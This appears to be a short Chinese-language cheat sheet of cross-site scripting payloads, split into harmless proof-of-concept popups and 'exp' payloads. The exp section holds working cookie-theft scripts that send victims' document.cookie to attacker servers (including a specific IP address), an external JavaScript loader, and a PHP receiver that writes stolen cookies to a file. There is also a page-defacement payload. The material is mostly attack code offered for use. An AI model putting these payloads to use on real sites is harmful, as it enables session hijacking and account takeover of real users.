微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

XSS漏洞的poc与exp

poc

  • <script>alert('xss')</script>  最简单常用的poc
  • <a href='' onclick=alert('xss')">type</a> 页面出现一个按钮type,点击触发onclick,然后执行弹窗
  • <img src=http://1.1.1.1/a.ipg one rror=alert('xss')> 加载图片,给一个错误图片地址,错误则执行弹窗
  • <script>window.location=‘http://1.1.1.1'</script> 重定向到指定的URL地址
  • <iframe SRC="http://1.1.1.1/victim" height = "0" width ="0"></iframe> 

exp

  • <script>document.body.innerHTML="<div style=visibility:visible;><h1>THIS
    WEBSITE IS UNDER ATTACK</h1></div>";</script>

  • <script>new Image().src="http://yourhost/getcookie.PHP?
    cookie="+document.cookie;</script>

    • 将别人登录的cookie信息捕获到自己的服务器上
    • 自己的服务器上编写一个接收cookie信息的PHP脚本getcookie.PHP
    • 此脚本将接收到的cookie信息写入到自动创建的txt文本cookie.txt里面
  • <script>document.location='http://47.99.184.173/getcookie.PHP?cookie='+document.cookie;</script>
    • 与上一个获取cookie信息的payload相似,相当于这是第二种获取cookie信息的exp
  • <script src=http://1.1.1.1/a.js></script>
    • 自己服务器上a,js的源码为:
    • var img = new Image();
      img.src = "http://1.1.1.1/cookies.PHP?cookie="+document.cookie;
    • 获取cookie信息的第三种方式,这种方式的payload比较简短,便于很好的利用。
    • 这种间接的方式,可以适用于所有的exp,将攻击代码放在服务器上的一个js文件里面,然后再漏洞点利用<script>访问

附上一个简短的getcookie.PHP脚本

<?PHP
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
?>

 

 

  

  

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。

相关推荐